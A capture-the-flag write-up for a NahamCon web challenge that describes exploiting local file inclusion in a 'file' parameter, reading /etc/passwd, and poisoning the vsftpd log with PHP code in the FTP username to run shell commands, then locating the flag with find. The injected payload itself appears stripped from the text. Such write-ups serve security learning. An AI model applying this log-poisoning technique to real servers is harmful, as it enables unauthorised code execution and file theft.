We have two links in task – [website of logging
service](http://challenge.nahamcon.com:31042) and
[ftp_server](http://challenge.nahamcon.com:30199). We can guess that it is ftp
server, because of "FTP can be used to access raw files if needed" in logging
service description, or by connecting via netcat:  
```  
~ nc challenge.nahamcon.com 30199  
220 Welcome to FTP Server  
```  
But unfortunately we can't get access to FTP because we don't know username
and password:  
```  
~ ftp challenge.nahamcon.com 30199  
Connected to challenge.nahamcon.com.  
220 Welcome to FTP Server  
Name (challenge.nahamcon.com:dizvyagintsev): idontknowusername  
331 Please specify the password.  
Password: idontknowpassword  
530 Login incorrect.  
ftp: Login failed.  
```  
Let's examine site a bit more, button "Learn more about our pricing" send us
to http://challenge.nahamcon.com:31042/index.php?file=pricing. We can see that
filename sends as GET param, so we can try local file enclusion.  
![LFI](https://i.ibb.co/3N4bKKq/2021-03-16-14-07-57.png)  
But we don't know in which file flag is, so we should find a way to execute
remote code on server. I tried some ways from this [cheat sheet
](https://highon.coffee/blog/lfi-cheat-sheet/), but nothing worked.  
From /etc/passwd we can find out that logging service use apache as webserver
and vsftpd as FTP server:  
```  
apache:x:100:101:apache:/var/www:/sbin/nologin  
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin  
```  
We can control content of their logs, so if we can open apache or vsfpd logs
we can inject php code on site and execute remote code. We can't open apache
logs `/var/log/apache2/access.log` but `/var/log/vsftpd.log` works.  
![vsftpd logs](https://i.ibb.co/NSXmbxn/2021-03-16-14-39-21.png)  
We can see that vsftpd logs username, so if it will be valid php code in ``,
so we can execute bash command from cmd GET param.  
```  
ftp challenge.nahamcon.com 30199  
Connected to challenge.nahamcon.com.  
220 Welcome to FTP Server  
Name (challenge.nahamcon.com:dizvyagintsev):  
331 Please specify the password.  
Password:  
530 Login incorrect.  
ftp: Login failed.  
```  
Let's use `find / -name 'flag.txt' | xargs cat` command that will recursively search for flag.txt file, starting from root directory and cat its content.  
![flag](https://i.ibb.co/CmTrwLn/2021-03-16-14-56-49.png)